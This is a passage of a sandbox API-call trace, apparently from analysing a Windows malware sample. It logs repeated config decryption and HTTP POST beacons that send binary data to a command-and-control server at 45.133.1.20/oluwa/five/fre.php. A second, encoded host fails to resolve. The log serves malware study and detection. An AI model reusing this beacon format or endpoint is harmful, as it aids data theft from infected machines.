dwFlags=0x0) returned 1 [0186.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.609] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.610] GetProcessHeap () returned 0x6a0000 [0186.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0186.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.611] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0186.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.612] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0186.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.616] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0186.616] GetProcessHeap () returned 0x6a0000 [0186.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0186.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.620] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0186.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.621] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0186.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.623] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0186.624] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.624] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0186.624] GetProcessHeap () returned 0x6a0000 [0186.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0186.624] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bfa58*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0186.624] GetProcessHeap () returned 0x6a0000 [0186.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0186.624] socket (af=2, type=1, protocol=6) returned 0x44c [0186.625] connect (s=0x44c, name=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0186.666] FreeAddrInfoW (pAddrInfo=0x6bfa58*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0186.666] GetProcessHeap () returned 0x6a0000 [0186.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0186.666] GetProcessHeap () returned 0x6a0000 [0186.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0186.667] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0186.668] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0186.668] GetProcessHeap () returned 0x6a0000 [0186.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6de0 [0186.668] GetProcessHeap () returned 0x6a0000 [0186.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0186.668] GetProcessHeap () returned 0x6a0000 [0186.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0186.669] GetProcessHeap () returned 0x6a0000 [0186.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0186.669] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0186.672] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0186.672] GetProcessHeap () returned 0x6a0000 [0186.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b6ea0 [0186.673] GetProcessHeap () returned 0x6a0000 [0186.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0186.673] send (s=0x44c, buf=0x6b6ea0*, len=242, flags=0) returned 242 [0186.674] send (s=0x44c, buf=0x6bb998*, len=159, flags=0) returned 159 [0186.674] GetProcessHeap () returned 0x6a0000 [0186.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0186.674] recv (in: s=0x44c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0186.769] GetProcessHeap () returned 0x6a0000 [0186.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ea0 | out: hHeap=0x6a0000) returned 1 [0186.770] GetProcessHeap () returned 0x6a0000 [0186.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0186.771] GetProcessHeap () returned 0x6a0000 [0186.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0186.772] GetProcessHeap () returned 0x6a0000 [0186.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0186.772] closesocket (s=0x44c) returned 0 [0186.773] GetProcessHeap () returned 0x6a0000 [0186.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0186.773] GetProcessHeap () returned 0x6a0000 [0186.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0186.774] GetProcessHeap () returned 0x6a0000 [0186.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0186.774] GetProcessHeap () returned 0x6a0000 [0186.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0186.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1178) returned 0x44c [0186.779] Sleep (dwMilliseconds=0xea60) [0186.781] GetProcessHeap () returned 0x6a0000 [0186.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0186.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.827] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.840] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0186.887] GetProcessHeap () returned 0x6a0000 [0186.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0186.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.889] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0186.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.894] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.895] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.895] GetProcessHeap () returned 0x6a0000 [0186.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0186.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.897] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0186.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.898] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0186.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.900] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0186.900] GetProcessHeap () returned 0x6a0000 [0186.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0186.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.905] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0186.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.906] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0186.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.908] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0186.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.909] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0186.909] GetProcessHeap () returned 0x6a0000 [0186.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0186.910] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0186.914] GetProcessHeap () returned 0x6a0000 [0186.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0186.915] GetProcessHeap () returned 0x6a0000 [0186.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0186.916] GetProcessHeap () returned 0x6a0000 [0186.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0186.916] GetProcessHeap () returned 0x6a0000 [0186.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0186.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.918] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.982] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0186.993] GetProcessHeap () returned 0x6a0000 [0186.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0186.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.995] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0186.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.996] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.997] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.997] GetProcessHeap () returned 0x6a0000 [0186.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0187.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.004] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0187.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.005] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0187.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.006] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0187.006] GetProcessHeap () returned 0x6a0000 [0187.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0187.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.007] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0187.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.008] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0187.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.009] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0187.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.013] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0187.013] GetProcessHeap () returned 0x6a0000 [0187.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0187.013] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0187.013] GetProcessHeap () returned 0x6a0000 [0187.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0187.013] socket (af=2, type=1, protocol=6) returned 0x450 [0187.013] connect (s=0x450, name=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0187.041] FreeAddrInfoW (pAddrInfo=0x6bf670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0187.041] GetProcessHeap () returned 0x6a0000 [0187.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0187.041] GetProcessHeap () returned 0x6a0000 [0187.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0187.042] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0187.045] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0187.045] GetProcessHeap () returned 0x6a0000 [0187.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6de0 [0187.045] GetProcessHeap () returned 0x6a0000 [0187.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0187.049] GetProcessHeap () returned 0x6a0000 [0187.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0187.049] GetProcessHeap () returned 0x6a0000 [0187.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0187.050] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0187.051] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0187.051] GetProcessHeap () returned 0x6a0000 [0187.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b6ea0 [0187.051] GetProcessHeap () returned 0x6a0000 [0187.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0187.052] send (s=0x450, buf=0x6b6ea0*, len=242, flags=0) returned 242 [0187.052] send (s=0x450, buf=0x6bb998*, len=159, flags=0) returned 159 [0187.053] GetProcessHeap () returned 0x6a0000 [0187.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0187.053] recv (in: s=0x450, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0187.147] GetProcessHeap () returned 0x6a0000 [0187.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ea0 | out: hHeap=0x6a0000) returned 1 [0187.148] GetProcessHeap () returned 0x6a0000 [0187.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0187.149] GetProcessHeap () returned 0x6a0000 [0187.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0187.150] GetProcessHeap () returned 0x6a0000 [0187.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0187.150] closesocket (s=0x450) returned 0 [0187.151] GetProcessHeap () returned 0x6a0000 [0187.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0187.151] GetProcessHeap () returned 0x6a0000 [0187.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0187.151] GetProcessHeap () returned 0x6a0000 [0187.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0187.152] GetProcessHeap () returned 0x6a0000 [0187.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0187.152] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x864) returned 0x450 [0187.155] Sleep (dwMilliseconds=0xea60) [0187.156] GetProcessHeap () returned 0x6a0000 [0187.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0187.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.163] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.175] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0187.184] GetProcessHeap () returned 0x6a0000 [0187.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bf490 [0187.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.185] CryptImportKey (in: hProv=0x6bf058, pbData=0x6bf490, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0187.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.188] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.189] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.190] GetProcessHeap () returned 0x6a0000 [0187.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf490 | out: hHeap=0x6a0000) returned 1 [0187.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.195] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0187.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.195] CryptDestroyKey (hKey=0x6ad020) returned 1 [0187.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.196] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0187.196] GetProcessHeap () returned 0x6a0000 [0187.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0187.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.197] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0187.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.198] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0187.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.199] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0187.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.201] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0187.201] GetProcessHeap () returned 0x6a0000 [0187.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0187.201] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0187.201] GetProcessHeap () returned 0x6a0000 [0187.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0187.201] GetProcessHeap () returned 0x6a0000 [0187.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0187.202] GetProcessHeap () returned 0x6a0000 [0187.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0187.202] GetProcessHeap () returned 0x6a0000 [0187.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0187.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.203] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.211] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0187.217] GetProcessHeap () returned 0x6a0000 [0187.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0187.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.218] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0187.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.222] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.223] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.223] GetProcessHeap () returned 0x6a0000 [0187.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0187.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.224] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0187.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.225] CryptDestroyKey (hKey=0x6ad020) returned 1 [0187.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.226] CryptReleaseContext (hProv=0x6beb90, 